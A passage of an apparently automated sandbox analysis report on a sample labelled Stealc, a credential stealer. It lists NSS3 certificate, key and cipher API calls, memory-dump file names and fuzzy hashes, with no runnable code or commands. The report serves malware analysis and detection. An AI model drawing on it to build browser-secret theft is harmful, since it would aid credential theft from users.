                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C9A9FA5
                                                                                                                                                                            • _PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C9A9FCF
                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6C9A9FF2
                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6C9AA01D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalEnterSection
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1904992153-0
                                                                                                                                                                            • Opcode ID: f3e07ad53734a55863d11b4e2659ecf01172796cb3517970626768b3f23f6b11
                                                                                                                                                                            • Instruction ID: a7e8dbbf8e2013eb1bb9d05f87cab26a764006565497782eccfa87f3c84486a0
                                                                                                                                                                            • Opcode Fuzzy Hash: f3e07ad53734a55863d11b4e2659ecf01172796cb3517970626768b3f23f6b11
                                                                                                                                                                            • Instruction Fuzzy Hash: DE51A1B2800600DBCB10DF65D48464AB7F4FF29319F26856AD85957B12E731EC9ACFD1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_Now.NSS3 ref: 6C89DCFA
                                                                                                                                                                              • Part of subcall function 6C959DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DC6
                                                                                                                                                                              • Part of subcall function 6C959DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DD1
                                                                                                                                                                              • Part of subcall function 6C959DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C959DED
                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C89DD40
                                                                                                                                                                            • CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C89DD62
                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6C89DD71
                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6C89DD81
                                                                                                                                                                            • CERT_RemoveCertListNode.NSS3(?), ref: 6C89DD8F
                                                                                                                                                                              • Part of subcall function 6C8B06A0: TlsGetValue.KERNEL32 ref: 6C8B06C2
                                                                                                                                                                              • Part of subcall function 6C8B06A0: EnterCriticalSection.KERNEL32(?), ref: 6C8B06D6
                                                                                                                                                                              • Part of subcall function 6C8B06A0: PR_Unlock.NSS3 ref: 6C8B06EB
                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6C89DD9E
                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(?), ref: 6C89DDB7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 653623313-0
                                                                                                                                                                            • Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                            • Instruction ID: e8a550e547f3b176409d386f05f4bb2299678685051a05a94e2e8a6e2b5b0ce9
                                                                                                                                                                            • Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
                                                                                                                                                                            • Instruction Fuzzy Hash: 4721AEB6E011199FDF219EADDE4099FB7B4AF05209B140831ED08A7721E731E9158BE1
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,6C90460B,?,?), ref: 6C893CA9
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C893CB9
                                                                                                                                                                            • PL_HashTableLookup.NSS3(?), ref: 6C893CC9
                                                                                                                                                                            • SECITEM_DupItem_Util.NSS3(00000000), ref: 6C893CD6
                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6C893CE6
                                                                                                                                                                            • CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C893CF6
                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C893D03
                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6C893D15
                                                                                                                                                                              • Part of subcall function 6C93DD70: TlsGetValue.KERNEL32 ref: 6C93DD8C
                                                                                                                                                                              • Part of subcall function 6C93DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C93DDB4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1376842649-0
                                                                                                                                                                            • Opcode ID: 38b48c4a54de8c026f8e36b4d1828cc91f92cbdedb58f616ce329fbf071b388a
                                                                                                                                                                            • Instruction ID: e6334a3177a43e662689096000619cb0239564dc1022100fca6f9c7679c4fce0
                                                                                                                                                                            • Opcode Fuzzy Hash: 38b48c4a54de8c026f8e36b4d1828cc91f92cbdedb58f616ce329fbf071b388a
                                                                                                                                                                            • Instruction Fuzzy Hash: F7112C77E04504A7DB212A2CBD059AA3A38EF5325DB280930EC2C53B11F732DD58D7D1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C8B11C0: PR_NewLock.NSS3 ref: 6C8B1216
                                                                                                                                                                            • free.MOZGLUE(?), ref: 6C899E17
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C899E25
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C899E4E
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C899EA2
                                                                                                                                                                              • Part of subcall function 6C8A9500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C8A9546
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C899EB6
                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6C899ED9
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C899F18
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3381623595-0
                                                                                                                                                                            • Opcode ID: 9ba2f05ae856d2b92c14b1ec5c652fe663f1d16cfd8ea10b3e6739f697f6d7e6
                                                                                                                                                                            • Instruction ID: 591e25b1106afc2cca6f790b6b248069ed438b2b55927b6bfa1f4022da491d94
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ba2f05ae856d2b92c14b1ec5c652fe663f1d16cfd8ea10b3e6739f697f6d7e6
                                                                                                                                                                            • Instruction Fuzzy Hash: BF8119B1A00601AFEB209F7CDD41AAB77A9BF55248F144D38E84D87B11FB31E915C7A1
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 6C8AAB10: DeleteCriticalSection.KERNEL32(D958E852,6C8B1397,5B5F5EC0,?,?,6C8AB1EE,2404110F,?,?), ref: 6C8AAB3C
                                                                                                                                                                              • Part of subcall function 6C8AAB10: free.MOZGLUE(D958E836,?,6C8AB1EE,2404110F,?,?), ref: 6C8AAB49
                                                                                                                                                                              • Part of subcall function 6C8AAB10: DeleteCriticalSection.KERNEL32(5D5E6CAA), ref: 6C8AAB5C
                                                                                                                                                                              • Part of subcall function 6C8AAB10: free.MOZGLUE(5D5E6C9E), ref: 6C8AAB63
                                                                                                                                                                              • Part of subcall function 6C8AAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C8AAB6F
                                                                                                                                                                              • Part of subcall function 6C8AAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C8AAB76
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8ADCFA
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000000), ref: 6C8ADD0E
                                                                                                                                                                            • PK11_IsFriendly.NSS3(?), ref: 6C8ADD73
                                                                                                                                                                            • PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C8ADD8B
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8ADE81
                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C8ADEA6
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8ADF08
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 519503562-0
                                                                                                                                                                            • Opcode ID: 36b37dbc1a9ba7a83ce416da88c5905754fee40be4d57d722b8c2abc33961f27
                                                                                                                                                                            • Instruction ID: 2a56f3a8c8180c3948a6fb37c6002b045810febb437f00c2b23800c215f19973
                                                                                                                                                                            • Opcode Fuzzy Hash: 36b37dbc1a9ba7a83ce416da88c5905754fee40be4d57d722b8c2abc33961f27
                                                                                                                                                                            • Instruction Fuzzy Hash: A091D7B5E001059FDB20CF98DA80BABB7B1AF54309F144826DD19DBB41E731E957CB91
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __allrem
                                                                                                                                                                            • String ID: winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2
                                                                                                                                                                            • API String ID: 2933888876-3221253098
                                                                                                                                                                            • Opcode ID: bb7537f61cd8684a513bf0e380513ef5cadb85a33872e1ecb695c322d6d64d49
                                                                                                                                                                            • Instruction ID: 6b7033878c83e6f0dae5a497e4ca0fff983649688833c4bdaf672f030734961d
                                                                                                                                                                            • Opcode Fuzzy Hash: bb7537f61cd8684a513bf0e380513ef5cadb85a33872e1ecb695c322d6d64d49
                                                                                                                                                                            • Instruction Fuzzy Hash: 5461DF71B01208DFDB54CF68DD84A6A7BB1FF49314F248628E915ABB80DB34EC06CB94
                                                                                                                                                                            APIs
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8BDF37
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8BDF4B
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8BDF96
                                                                                                                                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6C8BE02B
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8BE07E
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C8BE090
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8BE0AF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Error$Unlock$CriticalEnterSectionValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4073542275-0
                                                                                                                                                                            • Opcode ID: b42840194dbd7a5de56dba6ecda5971a9b7616dee6082f5b045271089217004f
                                                                                                                                                                            • Instruction ID: e864d0757350597b2130a99bac13e8dc5714ee0a8190bfcdc63a0c2fbca70cd6
                                                                                                                                                                            • Opcode Fuzzy Hash: b42840194dbd7a5de56dba6ecda5971a9b7616dee6082f5b045271089217004f
                                                                                                                                                                            • Instruction Fuzzy Hash: F551DF35604604DFEB309E28DA44B5A73B1BF54308F204D69E85A67BA1D731E849CB92
                                                                                                                                                                            APIs
                                                                                                                                                                            • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C8DAB3E,?,?,?), ref: 6C8DAC35
                                                                                                                                                                              • Part of subcall function 6C8BCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C8BCF16
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C8DAB3E,?,?,?), ref: 6C8DAC55
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F10F3
                                                                                                                                                                              • Part of subcall function 6C8F10C0: EnterCriticalSection.KERNEL32(?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F110C
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PL_ArenaAllocate.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1141
                                                                                                                                                                              • Part of subcall function 6C8F10C0: PR_Unlock.NSS3(?,?,?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F1182
                                                                                                                                                                              • Part of subcall function 6C8F10C0: TlsGetValue.KERNEL32(?,6C898802,00000000,00000008,?,6C88EF74,00000000), ref: 6C8F119C
                                                                                                                                                                            • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C8DAB3E,?,?), ref: 6C8DAC70
                                                                                                                                                                              • Part of subcall function 6C8BE300: TlsGetValue.KERNEL32 ref: 6C8BE33C
                                                                                                                                                                              • Part of subcall function 6C8BE300: EnterCriticalSection.KERNEL32(?), ref: 6C8BE350
                                                                                                                                                                              • Part of subcall function 6C8BE300: PR_Unlock.NSS3(?), ref: 6C8BE5BC
                                                                                                                                                                              • Part of subcall function 6C8BE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C8BE5CA
                                                                                                                                                                              • Part of subcall function 6C8BE300: TlsGetValue.KERNEL32 ref: 6C8BE5F2
                                                                                                                                                                              • Part of subcall function 6C8BE300: EnterCriticalSection.KERNEL32(?), ref: 6C8BE606
                                                                                                                                                                              • Part of subcall function 6C8BE300: PORT_Alloc_Util.NSS3(?), ref: 6C8BE613
                                                                                                                                                                            • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C8DAC92
                                                                                                                                                                            • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8DAB3E), ref: 6C8DACD7
                                                                                                                                                                            • PORT_Alloc_Util.NSS3(?), ref: 6C8DAD10
                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C8DAD2B
                                                                                                                                                                              • Part of subcall function 6C8BF360: TlsGetValue.KERNEL32(00000000,?,6C8DA904,?), ref: 6C8BF38B
                                                                                                                                                                              • Part of subcall function 6C8BF360: EnterCriticalSection.KERNEL32(?,?,?,6C8DA904,?), ref: 6C8BF3A0
                                                                                                                                                                              • Part of subcall function 6C8BF360: PR_Unlock.NSS3(?,?,?,?,6C8DA904,?), ref: 6C8BF3D3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2926855110-0
                                                                                                                                                                            • Opcode ID: a67a02bde32f32154de33aaae714735a57615c457d1d610bc7ebb54c056afc9a
                                                                                                                                                                            • Instruction ID: 0577454e44e266bc72699cb0e67df3e33558cfb2fc8073139f97c02a3219c180
                                                                                                                                                                            • Opcode Fuzzy Hash: a67a02bde32f32154de33aaae714735a57615c457d1d610bc7ebb54c056afc9a
                                                                                                                                                                            • Instruction Fuzzy Hash: 93314CB1E002055FEB20DF69DD409EF7776EF84728B2A8938E81597741EB31EC1587A1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PR_Now.NSS3 ref: 6C8B8C7C
                                                                                                                                                                              • Part of subcall function 6C959DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DC6
                                                                                                                                                                              • Part of subcall function 6C959DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C9A0A27), ref: 6C959DD1
                                                                                                                                                                              • Part of subcall function 6C959DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C959DED
                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8B8CB0
                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6C8B8CD1
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6C8B8CE5
                                                                                                                                                                            • PR_Unlock.NSS3(?), ref: 6C8B8D2E
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C8B8D62
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C8B8D93
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000011.00000002.2208637288.000000006C811000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C810000, based on PE: true
                                                                                                                                                                            • Associated: 00000011.00000002.2208588554.000000006C810000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209534569.000000006C9EE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209589341.000000006C9EF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209680200.000000006C9F0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000011.00000002.2209730764.000000006C9F5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_17_2_6c810000_stealc_default2.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3131193014-0
                                                                                                                                                                            • Opcode ID: 960f91ca6c15c10df389a5034675c9fb51f7a6c38fdad194192f5ec9bde470f8
                                                                                                                                                                            • Instruction ID: 2cef81c6cd3789465cf355c84393049077cc36771686c54c3c055b42c9fe8aef
                                                                                                                                                                            • Opcode Fuzzy Hash: 960f91ca6c15c10df389a5034675c9fb51f7a6c38fdad194192f5ec9bde470f8
                                                                                                                                                                            • Instruction Fuzzy Hash: FD313771A01216AFE7109F68DD407AA7770BF65319F28053BEA1977B50D730B924CBC1
                                                                                                                                                                            APIs
                                                                                                                                                                            • PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C8F9C5B), ref: 6C8F9D82
                                                                                                                                                                              • Part of subcall function 6C8F14C0: TlsGetValue.KERNEL32 ref: 6C8F14E0
                                                                                                                                                                              • Part of subcall function 6C8F14C0: EnterCriticalSection.KERNEL32 ref: 6C8F14F5
                                                                                                                                                                              • Part of subcall function 6C8F14C0: PR_Unlock.NSS3 ref: 6C8F150D
                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C8F9C5B), ref: 6C8F9DA9
                                                                                                                                                                              • Part of subcall function 6C8F1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C89895A,00000000,?,00000000,?,00000000,?,00000000,?,6C88F599,?,00000000), ref: 6C8F136A
                                                                                                                                                                              • Part of subcall function 6C8F1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C89895A,00000000,?,00000000,?,00000000,?,00000000,?,6C88F599,?,00000000), ref: 6C8F137E
                                                                                                                                                                              • Part of subcall function 6C8F1340: PL_ArenaGrow.NSS3(?,6C88F599,?,00000000,?,6C89895A,00000000,?,00000000,?,00000000,?,00000000,?,6C88F599,?), ref: 6C8F13CF
                                                                                                                                                                              • Part of subcall function 6C8F1340: PR_Unlock.NSS3(?,?,6C89895A,00000000,?,00000000,?,00000000,?,00000000,?,6C88F599,?,00000000), ref: 6C8F145C
                                                                                                                                                                            • PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C8F9C5B), ref: 6C8F9DCE
                                                                                                                                                                              • Part of subcall function 6C8F1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C89895A,00000000,?,00000000,?,00000000,?,00000000,?,6C88F599,?,00000000), ref: 6C8F13F0
                                                                                                                                                                              • Part of subcall function 6C8F1340: PL_ArenaGrow.NSS3(?,6C88F599,?,?,?,00000000,00000000,?,6C89895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6C8F1445
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008,6C8F9C5B), ref: 6C8F9DDC
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6C8F9C5B), ref: 6C8F9DFE
                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C8F9C5B), ref: 6C8F9E43
                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6C8F9C5B), ref: 6C8F9E91
